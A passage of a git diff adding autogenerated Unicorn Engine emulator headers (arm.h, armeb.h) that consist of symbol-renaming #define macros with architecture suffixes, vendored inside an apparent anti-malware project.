tcg_gen_and_i32 tcg_gen_and_i32_arm +#define tcg_gen_and_i64 tcg_gen_and_i64_arm +#define tcg_gen_andi_i32 tcg_gen_andi_i32_arm +#define tcg_gen_andi_i64 tcg_gen_andi_i64_arm +#define tcg_gen_br tcg_gen_br_arm +#define tcg_gen_brcond_i32 tcg_gen_brcond_i32_arm +#define tcg_gen_brcond_i64 tcg_gen_brcond_i64_arm +#define tcg_gen_brcondi_i32 tcg_gen_brcondi_i32_arm +#define tcg_gen_bswap16_i32 tcg_gen_bswap16_i32_arm +#define tcg_gen_bswap32_i32 tcg_gen_bswap32_i32_arm +#define tcg_gen_callN tcg_gen_callN_arm +#define tcg_gen_code tcg_gen_code_arm +#define tcg_gen_code_common tcg_gen_code_common_arm +#define tcg_gen_code_search_pc tcg_gen_code_search_pc_arm +#define tcg_gen_concat_i32_i64 tcg_gen_concat_i32_i64_arm +#define tcg_gen_debug_insn_start tcg_gen_debug_insn_start_arm +#define tcg_gen_deposit_i32 tcg_gen_deposit_i32_arm +#define tcg_gen_exit_tb tcg_gen_exit_tb_arm +#define tcg_gen_ext16s_i32 tcg_gen_ext16s_i32_arm +#define tcg_gen_ext16u_i32 tcg_gen_ext16u_i32_arm +#define tcg_gen_ext32s_i64 tcg_gen_ext32s_i64_arm +#define tcg_gen_ext32u_i64 tcg_gen_ext32u_i64_arm +#define tcg_gen_ext8s_i32 tcg_gen_ext8s_i32_arm +#define tcg_gen_ext8u_i32 tcg_gen_ext8u_i32_arm +#define tcg_gen_ext_i32_i64 tcg_gen_ext_i32_i64_arm +#define tcg_gen_extu_i32_i64 tcg_gen_extu_i32_i64_arm +#define tcg_gen_goto_tb tcg_gen_goto_tb_arm +#define tcg_gen_ld_i32 tcg_gen_ld_i32_arm +#define tcg_gen_ld_i64 tcg_gen_ld_i64_arm +#define tcg_gen_ldst_op_i32 tcg_gen_ldst_op_i32_arm +#define tcg_gen_ldst_op_i64 tcg_gen_ldst_op_i64_arm +#define tcg_gen_movcond_i32 tcg_gen_movcond_i32_arm +#define tcg_gen_movcond_i64 tcg_gen_movcond_i64_arm +#define tcg_gen_mov_i32 tcg_gen_mov_i32_arm +#define tcg_gen_mov_i64 tcg_gen_mov_i64_arm +#define tcg_gen_movi_i32 tcg_gen_movi_i32_arm +#define tcg_gen_movi_i64 tcg_gen_movi_i64_arm +#define tcg_gen_mul_i32 tcg_gen_mul_i32_arm +#define tcg_gen_muls2_i32 tcg_gen_muls2_i32_arm +#define tcg_gen_mulu2_i32 tcg_gen_mulu2_i32_arm +#define tcg_gen_neg_i32 
tcg_gen_neg_i32_arm +#define tcg_gen_neg_i64 tcg_gen_neg_i64_arm +#define tcg_gen_not_i32 tcg_gen_not_i32_arm +#define tcg_gen_op0 tcg_gen_op0_arm +#define tcg_gen_op1i tcg_gen_op1i_arm +#define tcg_gen_op2_i32 tcg_gen_op2_i32_arm +#define tcg_gen_op2_i64 tcg_gen_op2_i64_arm +#define tcg_gen_op2i_i32 tcg_gen_op2i_i32_arm +#define tcg_gen_op2i_i64 tcg_gen_op2i_i64_arm +#define tcg_gen_op3_i32 tcg_gen_op3_i32_arm +#define tcg_gen_op3_i64 tcg_gen_op3_i64_arm +#define tcg_gen_op4_i32 tcg_gen_op4_i32_arm +#define tcg_gen_op4i_i32 tcg_gen_op4i_i32_arm +#define tcg_gen_op4ii_i32 tcg_gen_op4ii_i32_arm +#define tcg_gen_op4ii_i64 tcg_gen_op4ii_i64_arm +#define tcg_gen_op5ii_i32 tcg_gen_op5ii_i32_arm +#define tcg_gen_op6_i32 tcg_gen_op6_i32_arm +#define tcg_gen_op6i_i32 tcg_gen_op6i_i32_arm +#define tcg_gen_op6i_i64 tcg_gen_op6i_i64_arm +#define tcg_gen_orc_i32 tcg_gen_orc_i32_arm +#define tcg_gen_or_i32 tcg_gen_or_i32_arm +#define tcg_gen_or_i64 tcg_gen_or_i64_arm +#define tcg_gen_ori_i32 tcg_gen_ori_i32_arm +#define tcg_gen_qemu_ld_i32 tcg_gen_qemu_ld_i32_arm +#define tcg_gen_qemu_ld_i64 tcg_gen_qemu_ld_i64_arm +#define tcg_gen_qemu_st_i32 tcg_gen_qemu_st_i32_arm +#define tcg_gen_qemu_st_i64 tcg_gen_qemu_st_i64_arm +#define tcg_gen_rotl_i32 tcg_gen_rotl_i32_arm +#define tcg_gen_rotli_i32 tcg_gen_rotli_i32_arm +#define tcg_gen_rotr_i32 tcg_gen_rotr_i32_arm +#define tcg_gen_rotri_i32 tcg_gen_rotri_i32_arm +#define tcg_gen_sar_i32 tcg_gen_sar_i32_arm +#define tcg_gen_sari_i32 tcg_gen_sari_i32_arm +#define tcg_gen_setcond_i32 tcg_gen_setcond_i32_arm +#define tcg_gen_shl_i32 tcg_gen_shl_i32_arm +#define tcg_gen_shl_i64 tcg_gen_shl_i64_arm +#define tcg_gen_shli_i32 tcg_gen_shli_i32_arm +#define tcg_gen_shli_i64 tcg_gen_shli_i64_arm +#define tcg_gen_shr_i32 tcg_gen_shr_i32_arm +#define tcg_gen_shifti_i64 tcg_gen_shifti_i64_arm +#define tcg_gen_shr_i64 tcg_gen_shr_i64_arm +#define tcg_gen_shri_i32 tcg_gen_shri_i32_arm +#define tcg_gen_shri_i64 tcg_gen_shri_i64_arm +#define 
tcg_gen_st_i32 tcg_gen_st_i32_arm +#define tcg_gen_st_i64 tcg_gen_st_i64_arm +#define tcg_gen_sub_i32 tcg_gen_sub_i32_arm +#define tcg_gen_sub_i64 tcg_gen_sub_i64_arm +#define tcg_gen_subi_i32 tcg_gen_subi_i32_arm +#define tcg_gen_trunc_i64_i32 tcg_gen_trunc_i64_i32_arm +#define tcg_gen_trunc_shr_i64_i32 tcg_gen_trunc_shr_i64_i32_arm +#define tcg_gen_xor_i32 tcg_gen_xor_i32_arm +#define tcg_gen_xor_i64 tcg_gen_xor_i64_arm +#define tcg_gen_xori_i32 tcg_gen_xori_i32_arm +#define tcg_get_arg_str_i32 tcg_get_arg_str_i32_arm +#define tcg_get_arg_str_i64 tcg_get_arg_str_i64_arm +#define tcg_get_arg_str_idx tcg_get_arg_str_idx_arm +#define tcg_global_mem_new_i32 tcg_global_mem_new_i32_arm +#define tcg_global_mem_new_i64 tcg_global_mem_new_i64_arm +#define tcg_global_mem_new_internal tcg_global_mem_new_internal_arm +#define tcg_global_reg_new_i32 tcg_global_reg_new_i32_arm +#define tcg_global_reg_new_i64 tcg_global_reg_new_i64_arm +#define tcg_global_reg_new_internal tcg_global_reg_new_internal_arm +#define tcg_handle_interrupt tcg_handle_interrupt_arm +#define tcg_init tcg_init_arm +#define tcg_invert_cond tcg_invert_cond_arm +#define tcg_la_bb_end tcg_la_bb_end_arm +#define tcg_la_br_end tcg_la_br_end_arm +#define tcg_la_func_end tcg_la_func_end_arm +#define tcg_liveness_analysis tcg_liveness_analysis_arm +#define tcg_malloc tcg_malloc_arm +#define tcg_malloc_internal tcg_malloc_internal_arm +#define tcg_op_defs_org tcg_op_defs_org_arm +#define tcg_opt_gen_mov tcg_opt_gen_mov_arm +#define tcg_opt_gen_movi tcg_opt_gen_movi_arm +#define tcg_optimize tcg_optimize_arm +#define tcg_out16 tcg_out16_arm +#define tcg_out32 tcg_out32_arm +#define tcg_out64 tcg_out64_arm +#define tcg_out8 tcg_out8_arm +#define tcg_out_addi tcg_out_addi_arm +#define tcg_out_branch tcg_out_branch_arm +#define tcg_out_brcond32 tcg_out_brcond32_arm +#define tcg_out_brcond64 tcg_out_brcond64_arm +#define tcg_out_bswap32 tcg_out_bswap32_arm +#define tcg_out_bswap64 tcg_out_bswap64_arm +#define 
tcg_out_call tcg_out_call_arm +#define tcg_out_cmp tcg_out_cmp_arm +#define tcg_out_ext16s tcg_out_ext16s_arm +#define tcg_out_ext16u tcg_out_ext16u_arm +#define tcg_out_ext32s tcg_out_ext32s_arm +#define tcg_out_ext32u tcg_out_ext32u_arm +#define tcg_out_ext8s tcg_out_ext8s_arm +#define tcg_out_ext8u tcg_out_ext8u_arm +#define tcg_out_jmp tcg_out_jmp_arm +#define tcg_out_jxx tcg_out_jxx_arm +#define tcg_out_label tcg_out_label_arm +#define tcg_out_ld tcg_out_ld_arm +#define tcg_out_modrm tcg_out_modrm_arm +#define tcg_out_modrm_offset tcg_out_modrm_offset_arm +#define tcg_out_modrm_sib_offset tcg_out_modrm_sib_offset_arm +#define tcg_out_mov tcg_out_mov_arm +#define tcg_out_movcond32 tcg_out_movcond32_arm +#define tcg_out_movcond64 tcg_out_movcond64_arm +#define tcg_out_movi tcg_out_movi_arm +#define tcg_out_op tcg_out_op_arm +#define tcg_out_pop tcg_out_pop_arm +#define tcg_out_push tcg_out_push_arm +#define tcg_out_qemu_ld tcg_out_qemu_ld_arm +#define tcg_out_qemu_ld_direct tcg_out_qemu_ld_direct_arm +#define tcg_out_qemu_ld_slow_path tcg_out_qemu_ld_slow_path_arm +#define tcg_out_qemu_st tcg_out_qemu_st_arm +#define tcg_out_qemu_st_direct tcg_out_qemu_st_direct_arm +#define tcg_out_qemu_st_slow_path tcg_out_qemu_st_slow_path_arm +#define tcg_out_reloc tcg_out_reloc_arm +#define tcg_out_rolw_8 tcg_out_rolw_8_arm +#define tcg_out_setcond32 tcg_out_setcond32_arm +#define tcg_out_setcond64 tcg_out_setcond64_arm +#define tcg_out_shifti tcg_out_shifti_arm +#define tcg_out_st tcg_out_st_arm +#define tcg_out_tb_finalize tcg_out_tb_finalize_arm +#define tcg_out_tb_init tcg_out_tb_init_arm +#define tcg_out_tlb_load tcg_out_tlb_load_arm +#define tcg_out_vex_modrm tcg_out_vex_modrm_arm +#define tcg_patch32 tcg_patch32_arm +#define tcg_patch8 tcg_patch8_arm +#define tcg_pcrel_diff tcg_pcrel_diff_arm +#define tcg_pool_reset tcg_pool_reset_arm +#define tcg_prologue_init tcg_prologue_init_arm +#define tcg_ptr_byte_diff tcg_ptr_byte_diff_arm +#define tcg_reg_alloc 
tcg_reg_alloc_arm +#define tcg_reg_alloc_bb_end tcg_reg_alloc_bb_end_arm +#define tcg_reg_alloc_call tcg_reg_alloc_call_arm +#define tcg_reg_alloc_mov tcg_reg_alloc_mov_arm +#define tcg_reg_alloc_movi tcg_reg_alloc_movi_arm +#define tcg_reg_alloc_op tcg_reg_alloc_op_arm +#define tcg_reg_alloc_start tcg_reg_alloc_start_arm +#define tcg_reg_free tcg_reg_free_arm +#define tcg_reg_sync tcg_reg_sync_arm +#define tcg_set_frame tcg_set_frame_arm +#define tcg_set_nop tcg_set_nop_arm +#define tcg_swap_cond tcg_swap_cond_arm +#define tcg_target_callee_save_regs tcg_target_callee_save_regs_arm +#define tcg_target_call_iarg_regs tcg_target_call_iarg_regs_arm +#define tcg_target_call_oarg_regs tcg_target_call_oarg_regs_arm +#define tcg_target_const_match tcg_target_const_match_arm +#define tcg_target_init tcg_target_init_arm +#define tcg_target_qemu_prologue tcg_target_qemu_prologue_arm +#define tcg_target_reg_alloc_order tcg_target_reg_alloc_order_arm +#define tcg_temp_alloc tcg_temp_alloc_arm +#define tcg_temp_free_i32 tcg_temp_free_i32_arm +#define tcg_temp_free_i64 tcg_temp_free_i64_arm +#define tcg_temp_free_internal tcg_temp_free_internal_arm +#define tcg_temp_local_new_i32 tcg_temp_local_new_i32_arm +#define tcg_temp_local_new_i64 tcg_temp_local_new_i64_arm +#define tcg_temp_new_i32 tcg_temp_new_i32_arm +#define tcg_temp_new_i64 tcg_temp_new_i64_arm +#define tcg_temp_new_internal tcg_temp_new_internal_arm +#define tcg_temp_new_internal_i32 tcg_temp_new_internal_i32_arm +#define tcg_temp_new_internal_i64 tcg_temp_new_internal_i64_arm +#define tdb_hash tdb_hash_arm +#define teecr_write teecr_write_arm +#define teehbr_access teehbr_access_arm +#define temp_allocate_frame temp_allocate_frame_arm +#define temp_dead temp_dead_arm +#define temps_are_copies temps_are_copies_arm +#define temp_save temp_save_arm +#define temp_sync temp_sync_arm +#define tgen_arithi tgen_arithi_arm +#define tgen_arithr tgen_arithr_arm +#define thumb2_logic_op thumb2_logic_op_arm +#define 
ti925t_initfn ti925t_initfn_arm +#define tlb_add_large_page tlb_add_large_page_arm +#define tlb_flush_entry tlb_flush_entry_arm +#define tlbi_aa64_asid_is_write tlbi_aa64_asid_is_write_arm +#define tlbi_aa64_asid_write tlbi_aa64_asid_write_arm +#define tlbi_aa64_vaa_is_write tlbi_aa64_vaa_is_write_arm +#define tlbi_aa64_vaa_write tlbi_aa64_vaa_write_arm +#define tlbi_aa64_va_is_write tlbi_aa64_va_is_write_arm +#define tlbi_aa64_va_write tlbi_aa64_va_write_arm +#define tlbiall_is_write tlbiall_is_write_arm +#define tlbiall_write tlbiall_write_arm +#define tlbiasid_is_write tlbiasid_is_write_arm +#define tlbiasid_write tlbiasid_write_arm +#define tlbimvaa_is_write tlbimvaa_is_write_arm +#define tlbimvaa_write tlbimvaa_write_arm +#define tlbimva_is_write tlbimva_is_write_arm +#define tlbimva_write tlbimva_write_arm +#define tlb_is_dirty_ram tlb_is_dirty_ram_arm +#define tlb_protect_code tlb_protect_code_arm +#define tlb_reset_dirty_range tlb_reset_dirty_range_arm +#define tlb_reset_dirty_range_all tlb_reset_dirty_range_all_arm +#define tlb_set_dirty tlb_set_dirty_arm +#define tlb_set_dirty1 tlb_set_dirty1_arm +#define tlb_unprotect_code_phys tlb_unprotect_code_phys_arm +#define tlb_vaddr_to_host tlb_vaddr_to_host_arm +#define token_get_type token_get_type_arm +#define token_get_value token_get_value_arm +#define token_is_escape token_is_escape_arm +#define token_is_keyword token_is_keyword_arm +#define token_is_operator token_is_operator_arm +#define tokens_append_from_iter tokens_append_from_iter_arm +#define to_qiv to_qiv_arm +#define to_qov to_qov_arm +#define tosa_init tosa_init_arm +#define tosa_machine_init tosa_machine_init_arm +#define tswap32 tswap32_arm +#define tswap64 tswap64_arm +#define type_class_get_size type_class_get_size_arm +#define type_get_by_name type_get_by_name_arm +#define type_get_parent type_get_parent_arm +#define type_has_parent type_has_parent_arm +#define type_initialize type_initialize_arm +#define type_initialize_interface 
type_initialize_interface_arm +#define type_is_ancestor type_is_ancestor_arm +#define type_new type_new_arm +#define type_object_get_size type_object_get_size_arm +#define type_register_internal type_register_internal_arm +#define type_table_add type_table_add_arm +#define type_table_get type_table_get_arm +#define type_table_lookup type_table_lookup_arm +#define uint16_to_float32 uint16_to_float32_arm +#define uint16_to_float64 uint16_to_float64_arm +#define uint32_to_float32 uint32_to_float32_arm +#define uint32_to_float64 uint32_to_float64_arm +#define uint64_to_float128 uint64_to_float128_arm +#define uint64_to_float32 uint64_to_float32_arm +#define uint64_to_float64 uint64_to_float64_arm +#define unassigned_io_ops unassigned_io_ops_arm +#define unassigned_io_read unassigned_io_read_arm +#define unassigned_io_write unassigned_io_write_arm +#define unassigned_mem_accepts unassigned_mem_accepts_arm +#define unassigned_mem_ops unassigned_mem_ops_arm +#define unassigned_mem_read unassigned_mem_read_arm +#define unassigned_mem_write unassigned_mem_write_arm +#define update_spsel update_spsel_arm +#define v6_cp_reginfo v6_cp_reginfo_arm +#define v6k_cp_reginfo v6k_cp_reginfo_arm +#define v7_cp_reginfo v7_cp_reginfo_arm +#define v7mp_cp_reginfo v7mp_cp_reginfo_arm +#define v7m_pop v7m_pop_arm +#define v7m_push v7m_push_arm +#define v8_cp_reginfo v8_cp_reginfo_arm +#define v8_el2_cp_reginfo v8_el2_cp_reginfo_arm +#define v8_el3_cp_reginfo v8_el3_cp_reginfo_arm +#define v8_el3_no_el2_cp_reginfo v8_el3_no_el2_cp_reginfo_arm +#define vapa_cp_reginfo vapa_cp_reginfo_arm +#define vbar_write vbar_write_arm +#define vfp_exceptbits_from_host vfp_exceptbits_from_host_arm +#define vfp_exceptbits_to_host vfp_exceptbits_to_host_arm +#define vfp_get_fpcr vfp_get_fpcr_arm +#define vfp_get_fpscr vfp_get_fpscr_arm +#define vfp_get_fpsr vfp_get_fpsr_arm +#define vfp_reg_offset vfp_reg_offset_arm +#define vfp_set_fpcr vfp_set_fpcr_arm +#define vfp_set_fpscr vfp_set_fpscr_arm +#define 
vfp_set_fpsr vfp_set_fpsr_arm +#define visit_end_implicit_struct visit_end_implicit_struct_arm +#define visit_end_list visit_end_list_arm +#define visit_end_struct visit_end_struct_arm +#define visit_end_union visit_end_union_arm +#define visit_get_next_type visit_get_next_type_arm +#define visit_next_list visit_next_list_arm +#define visit_optional visit_optional_arm +#define visit_start_implicit_struct visit_start_implicit_struct_arm +#define visit_start_list visit_start_list_arm +#define visit_start_struct visit_start_struct_arm +#define visit_start_union visit_start_union_arm +#define vmsa_cp_reginfo vmsa_cp_reginfo_arm +#define vmsa_tcr_el1_write vmsa_tcr_el1_write_arm +#define vmsa_ttbcr_raw_write vmsa_ttbcr_raw_write_arm +#define vmsa_ttbcr_reset vmsa_ttbcr_reset_arm +#define vmsa_ttbcr_write vmsa_ttbcr_write_arm +#define vmsa_ttbr_write vmsa_ttbr_write_arm +#define write_cpustate_to_list write_cpustate_to_list_arm +#define write_list_to_cpustate write_list_to_cpustate_arm +#define write_raw_cp_reg write_raw_cp_reg_arm +#define X86CPURegister32_lookup X86CPURegister32_lookup_arm +#define x86_op_defs x86_op_defs_arm +#define xpsr_read xpsr_read_arm +#define xpsr_write xpsr_write_arm +#define xscale_cpar_write xscale_cpar_write_arm +#define xscale_cp_reginfo xscale_cp_reginfo_arm +#define ARM_REGS_STORAGE_SIZE ARM_REGS_STORAGE_SIZE_arm +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/armeb.h b/ai_anti_malware/unicorn/unicorn-master/qemu/armeb.h new file mode 100644 index 0000000..30b771b --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/armeb.h @@ -0,0 +1,3021 @@ +/* Autogen header for Unicorn Engine - DONOT MODIFY */ +#ifndef UNICORN_AUTOGEN_ARMEB_H +#define UNICORN_AUTOGEN_ARMEB_H +#define arm_release arm_release_armeb +#define aarch64_tb_set_jmp_target aarch64_tb_set_jmp_target_armeb +#define ppc_tb_set_jmp_target ppc_tb_set_jmp_target_armeb +#define use_idiv_instructions_rt use_idiv_instructions_rt_armeb +#define 
tcg_target_deposit_valid tcg_target_deposit_valid_armeb +#define helper_power_down helper_power_down_armeb +#define check_exit_request check_exit_request_armeb +#define address_space_unregister address_space_unregister_armeb +#define tb_invalidate_phys_page_fast tb_invalidate_phys_page_fast_armeb +#define phys_mem_clean phys_mem_clean_armeb +#define tb_cleanup tb_cleanup_armeb +#define memory_map memory_map_armeb +#define memory_map_ptr memory_map_ptr_armeb +#define memory_unmap memory_unmap_armeb +#define memory_free memory_free_armeb +#define free_code_gen_buffer free_code_gen_buffer_armeb +#define helper_raise_exception helper_raise_exception_armeb +#define tcg_enabled tcg_enabled_armeb +#define tcg_exec_init tcg_exec_init_armeb +#define memory_register_types memory_register_types_armeb +#define cpu_exec_init_all cpu_exec_init_all_armeb +#define vm_start vm_start_armeb +#define resume_all_vcpus resume_all_vcpus_armeb +#define a15_l2ctlr_read a15_l2ctlr_read_armeb +#define a64_translate_init a64_translate_init_armeb +#define aa32_generate_debug_exceptions aa32_generate_debug_exceptions_armeb +#define aa64_cacheop_access aa64_cacheop_access_armeb +#define aa64_daif_access aa64_daif_access_armeb +#define aa64_daif_write aa64_daif_write_armeb +#define aa64_dczid_read aa64_dczid_read_armeb +#define aa64_fpcr_read aa64_fpcr_read_armeb +#define aa64_fpcr_write aa64_fpcr_write_armeb +#define aa64_fpsr_read aa64_fpsr_read_armeb +#define aa64_fpsr_write aa64_fpsr_write_armeb +#define aa64_generate_debug_exceptions aa64_generate_debug_exceptions_armeb +#define aa64_zva_access aa64_zva_access_armeb +#define aarch64_banked_spsr_index aarch64_banked_spsr_index_armeb +#define aarch64_restore_sp aarch64_restore_sp_armeb +#define aarch64_save_sp aarch64_save_sp_armeb +#define accel_find accel_find_armeb +#define accel_init_machine accel_init_machine_armeb +#define accel_type accel_type_armeb +#define access_with_adjusted_size access_with_adjusted_size_armeb +#define add128 
add128_armeb +#define add16_sat add16_sat_armeb +#define add16_usat add16_usat_armeb +#define add192 add192_armeb +#define add8_sat add8_sat_armeb +#define add8_usat add8_usat_armeb +#define add_cpreg_to_hashtable add_cpreg_to_hashtable_armeb +#define add_cpreg_to_list add_cpreg_to_list_armeb +#define addFloat128Sigs addFloat128Sigs_armeb +#define addFloat32Sigs addFloat32Sigs_armeb +#define addFloat64Sigs addFloat64Sigs_armeb +#define addFloatx80Sigs addFloatx80Sigs_armeb +#define add_qemu_ldst_label add_qemu_ldst_label_armeb +#define address_space_access_valid address_space_access_valid_armeb +#define address_space_destroy address_space_destroy_armeb +#define address_space_destroy_dispatch address_space_destroy_dispatch_armeb +#define address_space_get_flatview address_space_get_flatview_armeb +#define address_space_init address_space_init_armeb +#define address_space_init_dispatch address_space_init_dispatch_armeb +#define address_space_lookup_region address_space_lookup_region_armeb +#define address_space_map address_space_map_armeb +#define address_space_read address_space_read_armeb +#define address_space_rw address_space_rw_armeb +#define address_space_translate address_space_translate_armeb +#define address_space_translate_for_iotlb address_space_translate_for_iotlb_armeb +#define address_space_translate_internal address_space_translate_internal_armeb +#define address_space_unmap address_space_unmap_armeb +#define address_space_update_topology address_space_update_topology_armeb +#define address_space_update_topology_pass address_space_update_topology_pass_armeb +#define address_space_write address_space_write_armeb +#define addrrange_contains addrrange_contains_armeb +#define addrrange_end addrrange_end_armeb +#define addrrange_equal addrrange_equal_armeb +#define addrrange_intersection addrrange_intersection_armeb +#define addrrange_intersects addrrange_intersects_armeb +#define addrrange_make addrrange_make_armeb +#define adjust_endianness 
adjust_endianness_armeb +#define all_helpers all_helpers_armeb +#define alloc_code_gen_buffer alloc_code_gen_buffer_armeb +#define alloc_entry alloc_entry_armeb +#define always_true always_true_armeb +#define arm1026_initfn arm1026_initfn_armeb +#define arm1136_initfn arm1136_initfn_armeb +#define arm1136_r2_initfn arm1136_r2_initfn_armeb +#define arm1176_initfn arm1176_initfn_armeb +#define arm11mpcore_initfn arm11mpcore_initfn_armeb +#define arm926_initfn arm926_initfn_armeb +#define arm946_initfn arm946_initfn_armeb +#define arm_ccnt_enabled arm_ccnt_enabled_armeb +#define arm_cp_read_zero arm_cp_read_zero_armeb +#define arm_cp_reset_ignore arm_cp_reset_ignore_armeb +#define arm_cpu_do_interrupt arm_cpu_do_interrupt_armeb +#define arm_cpu_exec_interrupt arm_cpu_exec_interrupt_armeb +#define arm_cpu_finalizefn arm_cpu_finalizefn_armeb +#define arm_cpu_get_phys_page_debug arm_cpu_get_phys_page_debug_armeb +#define arm_cpu_handle_mmu_fault arm_cpu_handle_mmu_fault_armeb +#define arm_cpu_initfn arm_cpu_initfn_armeb +#define arm_cpu_list arm_cpu_list_armeb +#define cpu_loop_exit cpu_loop_exit_armeb +#define arm_cpu_post_init arm_cpu_post_init_armeb +#define arm_cpu_realizefn arm_cpu_realizefn_armeb +#define arm_cpu_register_gdb_regs_for_features arm_cpu_register_gdb_regs_for_features_armeb +#define arm_cpu_register_types arm_cpu_register_types_armeb +#define cpu_resume_from_signal cpu_resume_from_signal_armeb +#define arm_cpus arm_cpus_armeb +#define arm_cpu_set_pc arm_cpu_set_pc_armeb +#define arm_cp_write_ignore arm_cp_write_ignore_armeb +#define arm_current_el arm_current_el_armeb +#define arm_dc_feature arm_dc_feature_armeb +#define arm_debug_excp_handler arm_debug_excp_handler_armeb +#define arm_debug_target_el arm_debug_target_el_armeb +#define arm_el_is_aa64 arm_el_is_aa64_armeb +#define arm_env_get_cpu arm_env_get_cpu_armeb +#define arm_excp_target_el arm_excp_target_el_armeb +#define arm_excp_unmasked arm_excp_unmasked_armeb +#define arm_feature 
arm_feature_armeb +#define arm_generate_debug_exceptions arm_generate_debug_exceptions_armeb +#define gen_intermediate_code gen_intermediate_code_armeb +#define gen_intermediate_code_pc gen_intermediate_code_pc_armeb +#define arm_gen_test_cc arm_gen_test_cc_armeb +#define arm_gt_ptimer_cb arm_gt_ptimer_cb_armeb +#define arm_gt_vtimer_cb arm_gt_vtimer_cb_armeb +#define arm_handle_psci_call arm_handle_psci_call_armeb +#define arm_is_psci_call arm_is_psci_call_armeb +#define arm_is_secure arm_is_secure_armeb +#define arm_is_secure_below_el3 arm_is_secure_below_el3_armeb +#define arm_ldl_code arm_ldl_code_armeb +#define arm_lduw_code arm_lduw_code_armeb +#define arm_log_exception arm_log_exception_armeb +#define arm_reg_read arm_reg_read_armeb +#define arm_reg_reset arm_reg_reset_armeb +#define arm_reg_write arm_reg_write_armeb +#define restore_state_to_opc restore_state_to_opc_armeb +#define arm_rmode_to_sf arm_rmode_to_sf_armeb +#define arm_singlestep_active arm_singlestep_active_armeb +#define tlb_fill tlb_fill_armeb +#define tlb_flush tlb_flush_armeb +#define tlb_flush_page tlb_flush_page_armeb +#define tlb_set_page tlb_set_page_armeb +#define arm_translate_init arm_translate_init_armeb +#define arm_v7m_class_init arm_v7m_class_init_armeb +#define arm_v7m_cpu_do_interrupt arm_v7m_cpu_do_interrupt_armeb +#define ats_access ats_access_armeb +#define ats_write ats_write_armeb +#define bad_mode_switch bad_mode_switch_armeb +#define bank_number bank_number_armeb +#define bitmap_zero_extend bitmap_zero_extend_armeb +#define bp_wp_matches bp_wp_matches_armeb +#define breakpoint_invalidate breakpoint_invalidate_armeb +#define build_page_bitmap build_page_bitmap_armeb +#define bus_add_child bus_add_child_armeb +#define bus_class_init bus_class_init_armeb +#define bus_info bus_info_armeb +#define bus_unparent bus_unparent_armeb +#define cache_block_ops_cp_reginfo cache_block_ops_cp_reginfo_armeb +#define cache_dirty_status_cp_reginfo cache_dirty_status_cp_reginfo_armeb 
+#define cache_test_clean_cp_reginfo cache_test_clean_cp_reginfo_armeb +#define call_recip_estimate call_recip_estimate_armeb +#define can_merge can_merge_armeb +#define capacity_increase capacity_increase_armeb +#define ccsidr_read ccsidr_read_armeb +#define check_ap check_ap_armeb +#define check_breakpoints check_breakpoints_armeb +#define check_watchpoints check_watchpoints_armeb +#define cho cho_armeb +#define clear_bit clear_bit_armeb +#define clz32 clz32_armeb +#define clz64 clz64_armeb +#define cmp_flatrange_addr cmp_flatrange_addr_armeb +#define code_gen_alloc code_gen_alloc_armeb +#define commonNaNToFloat128 commonNaNToFloat128_armeb +#define commonNaNToFloat16 commonNaNToFloat16_armeb +#define commonNaNToFloat32 commonNaNToFloat32_armeb +#define commonNaNToFloat64 commonNaNToFloat64_armeb +#define commonNaNToFloatx80 commonNaNToFloatx80_armeb +#define compute_abs_deadline compute_abs_deadline_armeb +#define cond_name cond_name_armeb +#define configure_accelerator configure_accelerator_armeb +#define container_get container_get_armeb +#define container_info container_info_armeb +#define container_register_types container_register_types_armeb +#define contextidr_write contextidr_write_armeb +#define core_log_global_start core_log_global_start_armeb +#define core_log_global_stop core_log_global_stop_armeb +#define core_memory_listener core_memory_listener_armeb +#define cortexa15_cp_reginfo cortexa15_cp_reginfo_armeb +#define cortex_a15_initfn cortex_a15_initfn_armeb +#define cortexa8_cp_reginfo cortexa8_cp_reginfo_armeb +#define cortex_a8_initfn cortex_a8_initfn_armeb +#define cortexa9_cp_reginfo cortexa9_cp_reginfo_armeb +#define cortex_a9_initfn cortex_a9_initfn_armeb +#define cortex_m3_initfn cortex_m3_initfn_armeb +#define count_cpreg count_cpreg_armeb +#define countLeadingZeros32 countLeadingZeros32_armeb +#define countLeadingZeros64 countLeadingZeros64_armeb +#define cp_access_ok cp_access_ok_armeb +#define cpacr_write cpacr_write_armeb +#define 
cpreg_field_is_64bit cpreg_field_is_64bit_armeb +#define cp_reginfo cp_reginfo_armeb +#define cpreg_key_compare cpreg_key_compare_armeb +#define cpreg_make_keylist cpreg_make_keylist_armeb +#define cp_reg_reset cp_reg_reset_armeb +#define cpreg_to_kvm_id cpreg_to_kvm_id_armeb +#define cpsr_read cpsr_read_armeb +#define cpsr_write cpsr_write_armeb +#define cptype_valid cptype_valid_armeb +#define cpu_abort cpu_abort_armeb +#define cpu_arm_exec cpu_arm_exec_armeb +#define cpu_arm_gen_code cpu_arm_gen_code_armeb +#define cpu_arm_init cpu_arm_init_armeb +#define cpu_breakpoint_insert cpu_breakpoint_insert_armeb +#define cpu_breakpoint_remove cpu_breakpoint_remove_armeb +#define cpu_breakpoint_remove_all cpu_breakpoint_remove_all_armeb +#define cpu_breakpoint_remove_by_ref cpu_breakpoint_remove_by_ref_armeb +#define cpu_can_do_io cpu_can_do_io_armeb +#define cpu_can_run cpu_can_run_armeb +#define cpu_class_init cpu_class_init_armeb +#define cpu_common_class_by_name cpu_common_class_by_name_armeb +#define cpu_common_exec_interrupt cpu_common_exec_interrupt_armeb +#define cpu_common_get_arch_id cpu_common_get_arch_id_armeb +#define cpu_common_get_memory_mapping cpu_common_get_memory_mapping_armeb +#define cpu_common_get_paging_enabled cpu_common_get_paging_enabled_armeb +#define cpu_common_has_work cpu_common_has_work_armeb +#define cpu_common_initfn cpu_common_initfn_armeb +#define cpu_common_noop cpu_common_noop_armeb +#define cpu_common_parse_features cpu_common_parse_features_armeb +#define cpu_common_realizefn cpu_common_realizefn_armeb +#define cpu_common_reset cpu_common_reset_armeb +#define cpu_dump_statistics cpu_dump_statistics_armeb +#define cpu_exec_init cpu_exec_init_armeb +#define cpu_flush_icache_range cpu_flush_icache_range_armeb +#define cpu_gen_init cpu_gen_init_armeb +#define cpu_get_clock cpu_get_clock_armeb +#define cpu_get_real_ticks cpu_get_real_ticks_armeb +#define cpu_get_tb_cpu_state cpu_get_tb_cpu_state_armeb +#define cpu_handle_debug_exception 
